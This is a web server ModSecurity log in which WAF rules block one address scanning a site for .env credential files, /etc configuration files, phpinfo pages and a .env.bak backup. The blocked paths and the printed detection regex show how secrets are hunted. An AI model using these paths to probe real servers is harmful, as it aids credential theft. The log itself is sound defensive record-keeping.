[Tue May 26 15:15:23.295640 2026] [security2:error] [pid 700087:tid 700136] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/etc/boto.cfg"] [unique_id "ahVrs5PHQM4as9fEIIZ8OQAALjA"]
[Tue May 26 15:15:23.295853 2026] [security2:error] [pid 700087:tid 700151] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/etc/apache2/apache2.conf"] [unique_id "ahVrs5PHQM4as9fEIIZ8OAAALj8"]
[Tue May 26 15:15:23.296750 2026] [security2:error] [pid 700087:tid 700151] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/fe/.env"] [unique_id "ahVrs5PHQM4as9fEIIZ8OgAALj8"]
[Tue May 26 15:15:23.408522 2026] [security2:error] [pid 700087:tid 700160] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/front/.env"] [unique_id "ahVrs5PHQM4as9fEIIZ8UwAAEEg"]
[Tue May 26 15:15:23.411711 2026] [security2:error] [pid 700087:tid 700152] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/frontend/.env"] [unique_id "ahVrs5PHQM4as9fEIIZ8VQAAXEA"]
[Tue May 26 15:15:23.421024 2026] [security2:error] [pid 700087:tid 700181] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/info.php"] [unique_id "ahVrs5PHQM4as9fEIIZ8XQAAGF0"]
[Tue May 26 15:15:23.421433 2026] [security2:error] [pid 700087:tid 700181] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/infophp.php"] [unique_id "ahVrs5PHQM4as9fEIIZ8XgAAGF0"]
[Tue May 26 15:15:23.421798 2026] [security2:error] [pid 700087:tid 700181] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/infos.php"] [unique_id "ahVrs5PHQM4as9fEIIZ8XwAAGF0"]
[Tue May 26 15:15:23.470260 2026] [security2:error] [pid 700087:tid 700189] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/laravel/.env"] [unique_id "ahVrs5PHQM4as9fEIIZ8YgAAHGU"]
[Tue May 26 15:15:23.534432 2026] [security2:error] [pid 700087:tid 700185] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/lms/.env"] [unique_id "ahVrs5PHQM4as9fEIIZ8ZQAADWE"]
[Tue May 26 15:15:23.536930 2026] [security2:error] [pid 700087:tid 700187] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/local/.env"] [unique_id "ahVrs5PHQM4as9fEIIZ8ZwAAImM"]
[Tue May 26 15:15:23.540202 2026] [security2:error] [pid 700087:tid 700195] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/marketing/.env"] [unique_id "ahVrs5PHQM4as9fEIIZ8bAAAIms"]
[Tue May 26 15:15:23.541010 2026] [security2:error] [pid 700087:tid 700134] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/market/.env"] [unique_id "ahVrs5PHQM4as9fEIIZ8awAAIi4"]
[Tue May 26 15:15:23.546384 2026] [security2:error] [pid 700087:tid 700165] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/media/.env"] [unique_id "ahVrs5PHQM4as9fEIIZ8bwAAS00"]
[Tue May 26 15:15:23.568088 2026] [security2:error] [pid 700087:tid 700172] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/new/.env"] [unique_id "ahVrs5PHQM4as9fEIIZ8cwAAGlQ"]
[Tue May 26 15:15:23.584853 2026] [security2:error] [pid 700087:tid 700173] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/node-api/.env"] [unique_id "ahVrs5PHQM4as9fEIIZ8dAAAZVU"]
[Tue May 26 15:15:23.596067 2026] [security2:error] [pid 700087:tid 700193] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/node/.env"] [unique_id "ahVrs5PHQM4as9fEIIZ8dQAAKWk"]
[Tue May 26 15:15:23.659930 2026] [security2:error] [pid 700087:tid 700176] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/node/api/.env"] [unique_id "ahVrs5PHQM4as9fEIIZ8egAAZlg"]
[Tue May 26 15:15:23.662664 2026] [security2:error] [pid 700087:tid 700169] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/node/backend/.env"] [unique_id "ahVrs5PHQM4as9fEIIZ8ewAASVE"]
[Tue May 26 15:15:23.663514 2026] [security2:error] [pid 700087:tid 700137] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/nodeapi/.env"] [unique_id "ahVrs5PHQM4as9fEIIZ8fAAASTE"]
[Tue May 26 15:15:23.665589 2026] [security2:error] [pid 700087:tid 700170] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/nodeweb/.env"] [unique_id "ahVrs5PHQM4as9fEIIZ8fQAAMlI"]
[Tue May 26 15:15:23.667589 2026] [security2:error] [pid 700087:tid 700200] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/old/.env"] [unique_id "ahVrs5PHQM4as9fEIIZ8ggAAMnA"]
[Tue May 26 15:15:23.672446 2026] [security2:error] [pid 700087:tid 700202] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/opt/.env"] [unique_id "ahVrs5PHQM4as9fEIIZ8hAAAQ3I"]
[Tue May 26 15:15:23.805527 2026] [security2:error] [pid 700087:tid 700168] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/php-info.php"] [unique_id "ahVrs5PHQM4as9fEIIZ8mwAAVVA"]
[Tue May 26 15:15:23.819915 2026] [security2:error] [pid 700087:tid 700104] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/php.php"] [unique_id "ahVrs5PHQM4as9fEIIZ8ngAAOxA"]
[Tue May 26 15:15:23.837456 2026] [security2:error] [pid 700087:tid 700102] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/php_info.php"] [unique_id "ahVrs5PHQM4as9fEIIZ8nwAAaw4"]
[Tue May 26 15:15:23.915462 2026] [security2:error] [pid 700087:tid 700212] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/phpinfo.php"] [unique_id "ahVrs5PHQM4as9fEIIZ8ogAAA3w"]
[Tue May 26 15:15:23.918034 2026] [security2:error] [pid 700087:tid 700211] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/portal/.env"] [unique_id "ahVrs5PHQM4as9fEIIZ8pQAAX3s"]
[Tue May 26 15:15:23.920277 2026] [security2:error] [pid 700087:tid 700109] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/prod/.env"] [unique_id "ahVrs5PHQM4as9fEIIZ8qAAAXxU"]
[Tue May 26 15:15:23.923036 2026] [security2:error] [pid 700087:tid 700213] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/product/.env"] [unique_id "ahVrs5PHQM4as9fEIIZ8qgAAX30"]
[Tue May 26 15:15:23.926361 2026] [security2:error] [pid 700087:tid 700122] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/production/.env"] [unique_id "ahVrs5PHQM4as9fEIIZ8qwAAeiI"]
[Tue May 26 15:15:23.929443 2026] [security2:error] [pid 700087:tid 700204] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/project/.env"] [unique_id "ahVrs5PHQM4as9fEIIZ8rgAAd3Q"]
[Tue May 26 15:15:23.945288 2026] [security2:error] [pid 700087:tid 700118] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/public-api/.env"] [unique_id "ahVrs5PHQM4as9fEIIZ8sQAASh4"]
[Tue May 26 15:15:23.967078 2026] [security2:error] [pid 700087:tid 700117] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/public/.env"] [unique_id "ahVrs5PHQM4as9fEIIZ8swAAGR0"]
[Tue May 26 15:15:23.975093 2026] [security2:error] [pid 700087:tid 700116] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/public/phpinfo.php"] [unique_id "ahVrs5PHQM4as9fEIIZ8tAAAVBw"]
[Tue May 26 15:15:24.044172 2026] [security2:error] [pid 700087:tid 700111] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/public_html/.env"] [unique_id "ahVrtJPHQM4as9fEIIZ8uAAAexc"]
[Tue May 26 15:15:24.049468 2026] [security2:error] [pid 700087:tid 700106] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/qa/.env"] [unique_id "ahVrtJPHQM4as9fEIIZ8vgAAIxI"]
[Tue May 26 15:15:24.302056 2026] [security2:error] [pid 700087:tid 700162] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/s3/.env.bak"] [unique_id "ahVrtJPHQM4as9fEIIZ84QAATko"]
[Tue May 26 15:15:24.323837 2026] [security2:error] [pid 700087:tid 700164] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/server/.env"] [unique_id "ahVrtJPHQM4as9fEIIZ86wAAEUw"]
[Tue May 26 15:15:24.346041 2026] [security2:error] [pid 700087:tid 700183] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/server/api/.env"] [unique_id "ahVrtJPHQM4as9fEIIZ87AAAJF8"]
[Tue May 26 15:15:24.424056 2026] [security2:error] [pid 700087:tid 700184] [remote 195.178.110.199:35698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/server/backend/.env"] [unique_id "ahVrtJPHQM4as9fEIIZ87gAAXGA"]
